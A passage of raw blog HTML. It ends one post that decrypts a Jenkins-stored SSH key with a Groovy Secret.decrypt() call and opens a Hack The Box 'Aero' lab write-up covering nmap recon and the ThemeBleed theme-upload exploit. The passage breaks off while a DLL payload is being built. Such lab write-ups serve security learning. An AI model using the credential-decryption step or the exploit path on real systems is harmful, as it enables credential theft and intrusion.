url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAA7DAAAOwwHHb6hkAAAB2UlEQVR42m2R2W7TQBSG/SJtYo/X2J7F9szY2WmckArRG67K0lJAFHEBvEXpFRICqRECHvXn2CEgJC4+/TPHZ36fxQmCBGleoBAGgpeoygZWz1EWFlJWyLlClss9mdzfs+4sEEUpPBb2MBb1OJ4XQpBZwS20bGCqJUwxRpVXaNQEJquRpwplZqAzyhE1JOVKXoOnBnlSISNkXCAKRmRIrpKTYTGHzacw6gSSVGYT8FzDNlP4fgzPpUq8Pa4bwO3O9PYAoxzGYjjM8+EzH5yqrHlXkYXhM1ixIB1j06xJLdJYQSUlVFZB0V3xBjnFxEjTzy3ikNr3GBlGCm7IkYspdLOFrlc0wxZa30NlTjA2GzR1i8LehyxbyptgJGYIqYsgMYjTuiegtjsvxz27xdGDG6inn3H64SdO3//A7PUdFtd32L77jvn1Dss3O6zefqPYDgv6Nnn5FfXVF/DzTxg8vOkZnn0kbmmG5hE6RPsCdvsK5eoC1fo5itUlNGm1voSkmN1eQSyfEI+hNxco22fIF+dgv98fcLzBEHEQIBMVEi9GRMMOSWM2QkSDjoIIQRDTplP4NKPB0YA47nV4PAQbuv/gdJsZcd3Tb6zbVs/fzXUcNun7yR/Yf/gF9jAikwfTzCoAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="encrypted SSH key" title="" src="/static/2ab903a8a58ecf4c9fcbb4f25c0d2800/0af3a/encrypted-ssh-key.png" srcset="/static/2ab903a8a58ecf4c9fcbb4f25c0d2800/dda05/encrypted-ssh-key.png 158w, /static/2ab903a8a58ecf4c9fcbb4f25c0d2800/679a3/encrypted-ssh-key.png 315w, /static/2ab903a8a58ecf4c9fcbb4f25c0d2800/0af3a/encrypted-ssh-key.png 605w" sizes="(max-width: 605px) 100vw, 605px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I copied the value from the encrypted key above and went to <code class="language-text">Dashboard</code> → <code class="language-text">Manage Jenkins</code> → <code class="language-text">Script Console</code>. Then, I used the <code class="language-text">hudson.util.Secret.decrypt()</code> method to decrypt the key:</p> <div class="gatsby-highlight" data-language="groovy"><pre class="language-groovy"><code class="language-groovy"><span class="token function">println</span><span class="token punctuation">(</span>hudson<span class="token punctuation">.</span>util<span class="token punctuation">.</span>Secret<span class="token punctuation">.</span><span class="token function">decrypt</span><span class="token punctuation">(</span><span class="token interpolation-string"><span class="token string">"{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}"</span></span><span class="token punctuation">)</span><span class="token punctuation">)</span></code></pre></div> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/d1a5c6e95f8571c8b602f4f1fb983003/c2341/decrypt-ssh-key.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 85.44303797468356%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAYAAADdRIy+AAAACXBIWXMAAAsTAAALEwEAmpwYAAACJklEQVR42qWTy27bMBBF9TdeOEYNIxGCouimLpBts2r7O/6soG2SVdBNYltO/MgH2Hpab8kUdTtDhamA2oDbErgYigIP7wyHxsXwAy4/XWI4/IiTkx663S56vR76/T4GgwE6nQ5GoxHu7n7i6uobbm5u8f3HNb5++Yz3p28wfPsO5vk5TNPE2ZkJI4ozhGGslGUFkiRDmuaI4xRRlCDPcwhRYbcTrypL8bImKUo1b74rGEIIAmVoj6qqYG9sbEgRHVDXzVpbvI/VXpNSksMoQhBs1YcePPd9H67nw/EjrDeOgtu2A8/14Hmeiq7jUhYxZZRSZgk53MFgdwwsy/IVWJOlIAjURp/FcNelGCCKE6S0h5UQiGNGZeEoyKWRppmqFUN+pyyphglCch+SA3bB85SU0EHJNkS63SJ+UUKGYjqsovoaRVGiKAoF1OLasGNOQaskVSRJ6zX9V5G+9Vzyf5orhx7VSl+MBvKt/e2QtNfI8wIsviU9mjYQ/wbkze36/Tdw3w8+gFvnGFXcbrVEkAqsI7EfyOlzKx1TR53cbC1w/VzuBzaNHZC29CRDJb40foZa3BncCVpCcB/LQylLrFbPGI+nSpOJhfl8Tlq04gKOeimROpAz4gY/6HCxWBJoCsuaYTq1VGTw/f1YHfLwMKbnuFFPTkPZ9UEgO2QgQyzrUUFns0fSE8EmBJ3Q27bpRcXHAZfLldrEMAY1wCcVdRkcx/kD+Aub5f7eS8+yBgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Decrypt SSH key" title="" src="/static/d1a5c6e95f8571c8b602f4f1fb983003/50637/decrypt-ssh-key.png" srcset="/static/d1a5c6e95f8571c8b602f4f1fb983003/dda05/decrypt-ssh-key.png 158w, /static/d1a5c6e95f8571c8b602f4f1fb983003/679a3/decrypt-ssh-key.png 315w, /static/d1a5c6e95f8571c8b602f4f1fb983003/50637/decrypt-ssh-key.png 630w, /static/d1a5c6e95f8571c8b602f4f1fb983003/fddb0/decrypt-ssh-key.png 945w, /static/d1a5c6e95f8571c8b602f4f1fb983003/c2341/decrypt-ssh-key.png 1241w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Same as the first method, the key could then be used to log in over SSH.</p>https://mgarrity.com/hack-the-box-aero/https://mgarrity.com/hack-the-box-aero/Thu, 15 Aug 2024 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/c7d74b93abdcea501149d0e9a09ff898/3b67f/aero.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABAklEQVR42mMQkdX+jwuLymn/F5TR/s8pAaFBfHzqQZgBn2HcQIPkFTT/W+lqgmkeScKGMuAyjBeo2cZY539equX/rGa//8UZ1v8tDYHiUvgNxWogyHvyyjr/8yN1//N2df5n2Hb9P2/v9P+F0br/ZRW0/wvJkGAgyHYeCa3/5qYG/1N9ZP8LhxX8955z6L9ceMn/JB/5/2bGemDX43IldhdKg1yo+z/LT+2/BgfL/1gG5v92nGz/s4F8WSVd0lwIwmJQV1qY6P0vDlD/X+gi+T8NaJgFyHVAcTE5MmOZV1LrvwzQpabGBv+lFXXBfLJiGdmlwjJa//mBBgnLaON1GcxAAGIxAaLo82aKAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Aero" title="" src="/static/c7d74b93abdcea501149d0e9a09ff898/50637/aero.png" srcset="/static/c7d74b93abdcea501149d0e9a09ff898/dda05/aero.png 158w, /static/c7d74b93abdcea501149d0e9a09ff898/679a3/aero.png 315w, /static/c7d74b93abdcea501149d0e9a09ff898/50637/aero.png 630w, /static/c7d74b93abdcea501149d0e9a09ff898/fddb0/aero.png 945w, /static/c7d74b93abdcea501149d0e9a09ff898/3b67f/aero.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Aero is a Windows machine hosting a website that allows users to upload custom Windows 11 themes. Due to a known RCE vulnerability in Windows Themes (CVE-2023-38146 aka ThemeBleed), this can be leveraged to obtain a shell on the box. Enumeration of the machine leads to the discovery of a document regarding CVE-2023-28252, a privilege escalation vulnerability in Common Log File System (CLFS). Checking the installed hotfixes on the system reveals that the patch for CVE-2023-28252 is missing; thus an existing PoC for CVE-2023-28252 can be modified to obtain a system shell.</p> <p><code class="language-text">nmap</code> scan:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Aero] └─$ nmap -sC -sV -oA nmap/output 10.10.11.237 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-07 13:06 EDT Nmap scan report for 10.10.11.237 Host is up (0.040s latency). Not shown: 999 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 |_http-title: Aero Theme Hub Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.53 seconds</code></pre></div> <p>I visited the webpage on port <code class="language-text">80</code> which was a Windows 11 theme repository:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/58096652139f7077f52d2c504098b0d0/029ca/aero-webpage.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 77.84810126582278%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAACdElEQVR42q2R2UtqURTGT5aaBZlaET1YQQiS4oMUVApJQtFAJKVkhDYoGmFFZU4NNpk2UKR/7xffuuyDt6f7cB9+Z6+19xq+tY72+fmJr68vfHx84P39HW9vb2g0GnK23728vODx8RHPz89if39/o9lsotVqCazz+voKrV6vo1arSfD9/T2q1apAn/fq7eHhQd4JfSaz2W8hUvDp6UmHwYQ21bAQoU1UTLuvYonGj6pO2EA9ticQqlWx9NlIqVdoy8vLODo6QqlUEsrl8l8qOeLNzY34d3d3iEaj2N/fx+3trb4CohdMJBI4Pz/H1dUVcrkc0uk0jo+PxT47O8PFxYXcBQIBDAwMwGq1wuVyYXV1VeLy+TyKxSIqlYqgDQ8PY2trSxJZ+PLyEqenp9KVijgm/+rh4SHm5+cRiURwcHCAk5MTaUpoZzIZLC4uQuvr64PX65WiTOIDV1AoFAQqYLPr62u9IYtQXTabRSqVQiwWw/T0tKjXjEYjhoaGEAwGZT+7u7vY29sDV8FdsQFhIk+OT5sxyWRScqampmC328FamslkEsfj8WBhYUF2s76+jo2NDWxubmJ7exs7OzuIx+Niq5Ojh0IhTExMiLKuri5B6+7uFoWjo6OYnJyU5YfDYSwtLUnxlZUVOdfW1gTuidP4fD6MjY3B4XCgt7cXZrP5T0Ea7DAyMiLduE+OMDMzI8zNzWF2dlZsv98Pt9uN8fFxOJ1OyeF0FosFnFRG5ocOLwkV82RX/rD+/n5paLPZMDg4KIoIC/G9p6dH8vWROzs7YTAYhI6ODv1UtoJxvxtTjCrEd6K1F/oXVKLi97um1PwvfgCmvFYwV++k1gAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="aero webpage" title="" src="/static/58096652139f7077f52d2c504098b0d0/50637/aero-webpage.png" srcset="/static/58096652139f7077f52d2c504098b0d0/dda05/aero-webpage.png 158w, /static/58096652139f7077f52d2c504098b0d0/679a3/aero-webpage.png 315w, /static/58096652139f7077f52d2c504098b0d0/50637/aero-webpage.png 630w, /static/58096652139f7077f52d2c504098b0d0/fddb0/aero-webpage.png 945w, /static/58096652139f7077f52d2c504098b0d0/029ca/aero-webpage.png 1033w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The page had a section with a form where users could upload custom themes:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/6698ed2240875accb63a8c9085ffe9d7/029ca/aero-webpage-form.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 46.835443037974684%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABIElEQVR42q3QsU6DQBgH8Hs9HkM3nWEGTBhKGiUpGmSgQwstsxgDSMG2ocY+hGlNqQOkSV/g791FCJIODh1+ue++4393HFmv1zgnkqYpurIsa7D5crlEnucn17pIEAToCsMQcRxzrI6iiGPzumb9U1ni+z7aJpMJPNfl3F/T6ZT3x+NxYzQawfM8dPPEcRwww+EQtm0jSRJstl/43GxRFHvsdzt8FwUOZYlDVaGiSlofj0f+25Zl8Wy9DxkMBqgZhsFPnc1SxK8J3mjghb7f0yrH88c7otUKi8UC8/mcvym7NcuYptnsQXq9Hto0TYOqKFBVFTeyjOu7Pi4fH3Bh3ePqtg+V9hS6LtORfavr+p88EUURbZIk/Vs3yxBBEHBOPwviBEDhSnbQAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="aero webpage form" title="" src="/static/6698ed2240875accb63a8c9085ffe9d7/50637/aero-webpage-form.png" srcset="/static/6698ed2240875accb63a8c9085ffe9d7/dda05/aero-webpage-form.png 158w, /static/6698ed2240875accb63a8c9085ffe9d7/679a3/aero-webpage-form.png 315w, /static/6698ed2240875accb63a8c9085ffe9d7/50637/aero-webpage-form.png 630w, /static/6698ed2240875accb63a8c9085ffe9d7/fddb0/aero-webpage-form.png 945w, /static/6698ed2240875accb63a8c9085ffe9d7/029ca/aero-webpage-form.png 1033w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>There were two supported extensions listed in the dropdown for file type within the browse dialog, <code class="language-text">*.theme</code> and <code class="language-text">*.themepack</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 368px; " > <a class="gatsby-resp-image-link" href="/static/cff8de3633bdfa49cd7fa2cdfd4c0cd5/b86bf/supported-extensions.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 56.32911392405063%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAA7DAAAOwwHHb6hkAAABQElEQVR42o2SS2+CQBhFoWitWJu0izatgiDyEJQ3Kqg0bVj0DzTpponr/v/97TfT4MrQITm5k0DO9xgk188hihcUZy69d5YZJHFhhrkdESFP20suIiT0/IKLgnCDMNlRFjDmPmYt1l8aVgBp4UQQgX2c5HsU2xpxVkEzXEwNjzPRXehMbC4hWVT5P2w35h0xYU7CYlfzzDYHbKs3XsRcBNBFhKa1wvNkgenM5aNGScmF63gLP8wRpiUS6phNICQM0yO+Tz9Iixr+Okd5aJBSp2zkF82BRoXYyGyHXMjG6WIV7fH5daK9Heh3yehSSt4pkzvL+HwZs3aH47t7dDEajXGl9Oj8QNI9qmODqm7w+v5BXR+pKyZcwaRpHp90SPRABEVRMLgZ4XqgUqqUQ55D9ZajUuFevw9JlmWI0srljuK/znY0FiyF5O4AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="aero webpage supported extensions" title="" src="/static/cff8de3633bdfa49cd7fa2cdfd4c0cd5/b86bf/supported-extensions.png" srcset="/static/cff8de3633bdfa49cd7fa2cdfd4c0cd5/dda05/supported-extensions.png 158w, /static/cff8de3633bdfa49cd7fa2cdfd4c0cd5/679a3/supported-extensions.png 315w, /static/cff8de3633bdfa49cd7fa2cdfd4c0cd5/b86bf/supported-extensions.png 368w" sizes="(max-width: 368px) 100vw, 368px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>So I tried to upload a file called <code class="language-text">test.theme</code> which succeeded:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/2d3a6dc27ef161f92e60ec8fe10cbc12/5afa3/aero-webpage-form-upload-succeeded.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 62.0253164556962%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAA7DAAAOwwHHb6hkAAABwUlEQVR42p3Ry2saURQG8Pu3Ft20m9JFoKkTZzS48xldZJw0iitd+AKdquATH6jUiQ9w04CbUAilITVdiPbruVevTCgtoQM/zr33nPlmmGH9fh9Sr9c7su+HwyFGoxG63e6zGfusxBqNBqRWq/WHZrOJwWAg8HWn00G73RY9We0ZrFKpQJI32MPq9fpxzdl7MqxarR4zWKFQAJfL5ZDNZv9LPp+HzGGZTAZcsViEaX4iZZTLpFRGqVQST63VauItTNMUZ3Z8lgel02mRw1KpFJLJJL7c3uL+2wPuvt7j+8Mj1us1fj494cfjfr3ZbIDdL+x2u6Ptdgt+rVYrJBIJ8CxmGAbi8Th9jzY+Tyz6o2NMqE6nU1hkbFkY39xgMpvBWiwwI4uD+XyO5XIpvruu6+BZLBaLgYtEwnvhMEIkGgpBiUXhvI7jTeIKr68NvPqoQ4lGcBEMIkj90EGY5mUO8/v94AKBwDNhol1E8M64xMmVLryltZfOeC/AQw/4vMxhPp8PnMfjhaqqcLtVqhpVNzTae6iefXBBIV7Rc0PVtP0sOaO+9/wcMocpioK/cR28Pz0VXP+YlZjD4cBLOJ0vm/sNIZDEKdsJDb4AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="aero webpage form upload succeeded" title="" src="/static/2d3a6dc27ef161f92e60ec8fe10cbc12/50637/aero-webpage-form-upload-succeeded.png" srcset="/static/2d3a6dc27ef161f92e60ec8fe10cbc12/dda05/aero-webpage-form-upload-succeeded.png 158w, /static/2d3a6dc27ef161f92e60ec8fe10cbc12/679a3/aero-webpage-form-upload-succeeded.png 315w, /static/2d3a6dc27ef161f92e60ec8fe10cbc12/50637/aero-webpage-form-upload-succeeded.png 630w, /static/2d3a6dc27ef161f92e60ec8fe10cbc12/5afa3/aero-webpage-form-upload-succeeded.png 726w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The success message indicated that the theme would be tested, suggesting it would likely be opened. This could be leveraged to get remote code execution by exploiting a known vulnerability in Windows 11 themes, <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-38146" target="_blank">CVE-2023-38146</a> aka ThemeBleed.</p> <p>There's a PoC for ThemeBleed available on GitHub <a href="https://github.com/exploits-forsale/themebleed" target="_blank">here</a>.</p> <p>As stated in the GitHub repo, in order to make a custom payload, a DLL needs to be created with in export named <code class="language-text">VerifyThemeVersion</code> containing the code, then <code class="language-text">stage_3</code> within the <code class="language-text">data</code> directory of the PoC needs to be replaced with the newly created DLL.</p> <p>So, I switched to a Windows VM, opened Visual Studio, and created a new project with the <code class="language-text">Dynamic-Link Library (DLL)</code> template:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/16639e6264aa6d375a0b5ae3f7bec6e8/e9794/visual-studio-new-project-dll.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 66.45569620253164%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAABv0lEQVR42o2S6U7CQBSF+yJAO22n+06p7AhUE0iM+s/3f5DjuYMlxijy4+Q2M7ffnLtYURSjrErkWYayLJHlGSaTyVWO4yBNU2S8lxiGIcIgNDGO40veeAxHuVCuB0sHAfI8N6rrCkmSYMwESZSolELKsziKLjAqSWJ4noeA//q+bx61becClFfn8zmqsiKwYSyZ7F+htm0TQIdFgZx3KZ1qQl0Cx7yXqFyXDpXJteRAa20Ao9HoCjEOKcXvtiixX6/xvN+j326xXSywoYl50yCn84QuUzI8Qi0BDW5+asTzhOW89E94PZ3wfj7jjTr3PU6HA87Ho/nudzsc+UBKc9ZvoO/AkOX0iyX61QqPDw/YzmbYdR3W0+lVHdvRsXVaHN4CmunRYc7JzwiatS1aAgoOMORAIjPxAIo5LmGSexNopuwotHWL5XKJFV027Jus16C6rs06DdO+7fBLsioLDkKAA3gqTlmqAAUsK3SXQ0c5LLPFZr1Bx94NzsSVbIfLHsuuyl6qf3v4tULiUNxIuSJxVVWVAcudlKu1fz9QXv/uRCSQC0hD+5SOee/d18O/9lR61jQVspTTLz4Q6xU+AXL2fTY6TnblAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="visual studio new project DLL" title="" src="/static/16639e6264aa6d375a0b5ae3f7bec6e8/50637/visual-studio-new-project-dll.png" srcset="/static/16639e6264aa6d375a0b5ae3f7bec6e8/dda05/visual-studio-new-project-dll.png 158w, /static/16639e6264aa6d375a0b5ae3f7bec6e8/679a3/visual-studio-new-project-dll.png 315w, /static/16639e6264aa6d375a0b5ae3f7bec6e8/50637/visual-studio-new-project-dll.png 630w, /static/16639e6264aa6d375a0b5ae3f7bec6e8/fddb0/visual-studio-new-project-dll.png 945w, /static/16639e6264aa6d375a0b5ae3f7bec6e8/e9794/visual-studio-new-project-dll.png 1009w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>On the next page, I named the project and set the location:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/eedde12bf5ca9fd43eea4206baf2bb21/66d45/visual-studio-configure-project.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 61.39240506329114%; position: relative; bottom: 0; left: 0; background-image: 